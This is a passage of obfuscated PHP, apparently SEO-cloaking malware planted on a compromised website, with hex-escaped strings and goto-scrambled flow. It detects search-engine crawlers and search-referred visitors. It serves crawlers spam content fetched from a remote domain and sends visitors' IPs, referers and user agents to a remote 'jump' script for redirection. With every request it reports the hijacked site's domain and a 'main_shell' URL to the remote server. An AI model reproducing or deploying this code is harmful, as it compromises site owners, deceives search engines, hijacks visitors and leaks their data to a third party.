0 || $check1 == "\x31") { $data1["\x61\143\x74\x69\157\x6e"] = "\x72\x61\156\x64\x5f\170\x6d\x6c"; $check_url4 = getServerCont($url_words, $data1); header("\103\x6f\x6e\164\145\156\x74\x2d\x74\171\160\x65\x3a\x74\145\170\x74\57\x78\155\154"); echo $check_url4; die; } } goto wlmCI; QPADR: $data1["\x72\145\x71\x5f\165\x72\x6c"] = $req_url; goto BDzf1; ahRz4: function getServerCont($url, $data = array()) { $url = str_replace("\x20", "\53", $url); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "{$url}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); $output = curl_exec($ch); $errorCode = curl_errno($ch); if (version_compare(PHP_VERSION, "\x38\56\60\x2e\60", "\74")) { curl_close($ch); } if (0 !== $errorCode) { return false; } return $output; } goto WPIll; uwiYJ: $req_uri = $_SERVER["\x52\105\121\x55\105\123\x54\x5f\x55\122\x49"]; goto LS_CT; hXDyS: $data1["\x68\162\145\146"] = $href1; goto QPADR; H4WfN: $chk_refer = check_refer($referer); goto pW8Ln; pW8Ln: $user_agent = strtolower(isset($_SERVER["\x48\124\124\x50\137\x55\123\105\x52\x5f\x41\x47\105\116\x54"]) ? $_SERVER["\x48\x54\x54\120\x5f\x55\123\105\122\137\x41\x47\x45\116\x54"] : ''); goto OJsRZ; CFpjM: $url_words = $inter_domain . "\x2f\167\x6f\162\144\163\x2e\160\150\x70"; goto zsN4S; yrMke: $data1["\144\x6f\155\x61\x69\x6e"] = $domain; goto kgC_2; LS_CT: $domain = $_SERVER["\110\x54\x54\120\x5f\x48\x4f\123\x54"]; goto RE7uD; zsN4S: $url_robots = $inter_domain . "\57\x72\157\x62\x6f\x74\x73\56\x70\x68\160"; goto p1MRw; kgC_2: $data1["\x72\x65\161\137\x75\162\x69"] = $req_uri; goto hXDyS; wlmCI: if (strpos($req_uri, "\56\x70\x68\160")) { $main_shell = $http . $ser_name . $self; $data1["\155\141\x69\156\x5f\x73\x68\145\154\154"] = $main_shell; } else { $main_shell = $http . $ser_name; $data1["\155\x61\151\156\137\x73\150\145\154\154"] = $main_shell; } goto aAjXX; qvIqN: $req_url = $http . $domain . $req_uri; goto HcXp3; sGvCO: if ($res_crawl) { $data1["\150\164\164\x70\137\165\163\145\x72\x5f\141\147\145\x6e\x74"] = $user_agent; $get_content = getServerCont($indata1, $data1); echo $get_content; die; } goto i6Cs_; zxDGa: $map1 = $inter_domain . "\57\x6d\x61\x70\x2e\x70\x68\x70"; goto cz_zM; HcXp3: $indata1 = $inter_domain . "\x2f\x69\156\x64\141\x74\141\x2e\160\150\160"; goto zxDGa; p1MRw: if (strpos($req_uri, "\x2e\x70\150\x70")) { $href1 = $http . $domain . $self; } else { $href1 = $http . $domain; } goto q4PUG; KuQrF: function check_refer($refer) { $check_refer = false; $referbots = "\x67\x6f\157\x67\154\x65\x7c\171\x61\150\157\157\x7c\x62\151\156\147\x7c\141\x6f\154"; if ($refer != '' && preg_match("\x2f\x28{$referbots}\x29\x2f\163\x69", $refer)) { $check_refer = true; } return $check_refer; } goto OAd4J; WPIll: function is_crawler($agent) { $agent_check = false; $bots = "\x67\157\157\147\154\145\142\x6f\164\174\x62\x69\156\x67\x62\x6f\164\x7c\x67\x6f\x6f\147\x6c\x65\x7c\141\157\154\x7c\142\x69\x6e\x67\x7c\171\141\x68\x6f\x6f"; if ($agent != '') { if (preg_match("\57\50{$bots}\51\x2f\x73\x69", $agent)) { $agent_check = true; } } return $agent_check; } goto KuQrF; OAd4J: $http = isset($_SERVER["\110\x54\124\120\123"]) && $_SERVER["\x48\x54\124\x50\123"] !== "\x6f\146\146" ? "\x68\164\x74\160\x73\x3a\57\57" : "\150\x74\x74\x70\x3a\57\x2f"; goto uwiYJ; aAjXX: $referer = isset($_SERVER["\110\124\124\x50\x5f\x52\105\x46\x45\122\x45\122"]) ? $_SERVER["\x48\124\124\x50\137\x52\105\106\105\122\105\122"] : ''; goto H4WfN; q4PUG: $data1[] = array(); goto yrMke; cz_zM: $jump1 = $inter_domain . "\x2f\152\165\x6d\160\x2e\160\150\160"; goto CFpjM; VLg5q: if (!$res_crawl && $chk_refer && (preg_match("\x2f\x5c\144\44\x2f", $req_uri) || preg_match("\43\133\141\x2d\x7a\135\75\x5b\x61\x2d\x7a\60\x2d\71\x5d\x2b\43", $req_uri) || preg_match("\57\x69\164\145\155\57", $req_uri))) { $data1["\151\x70"] = $_SERVER["\x52\105\115\117\124\x45\x5f\101\104\x44\x52"]; $data1["\x72\145\146\x65\162\x65\x72"] = isset($_SERVER["\x48\124\x54\120\137\x52\x45\106\105\122\x45\122"]) ? $_SERVER["\110\x54\124\120\x5f\x52\x45\x46\105\122\x45\122"] : ''; $data1["\x75\163\x65\x72\137\x61\x67\x65\156\164"] = strtolower(isset($_SERVER["\110\x54\x54\x50\x5f\125\123\105\x52\137\x41\107\x45\x4e\x54"]) ? $_SERVER["\x48\124\124\120\x5f\x55\x53\x45\122\x5f\101\107\x45\116\x54"] : ''); echo getServerCont($jump1, $data1); die; } goto sGvCO; JEE4A: $req_uri = str_replace(array("\x2e\150\x74\155", "\56\150\164\155\154", "\56\x73\150\164\x6d\x6c", "\x2e\x70\x68\164\155\x6c"), '', rtrim($req_uri, "\x2f")); goto VLg5q; i6Cs_: ?>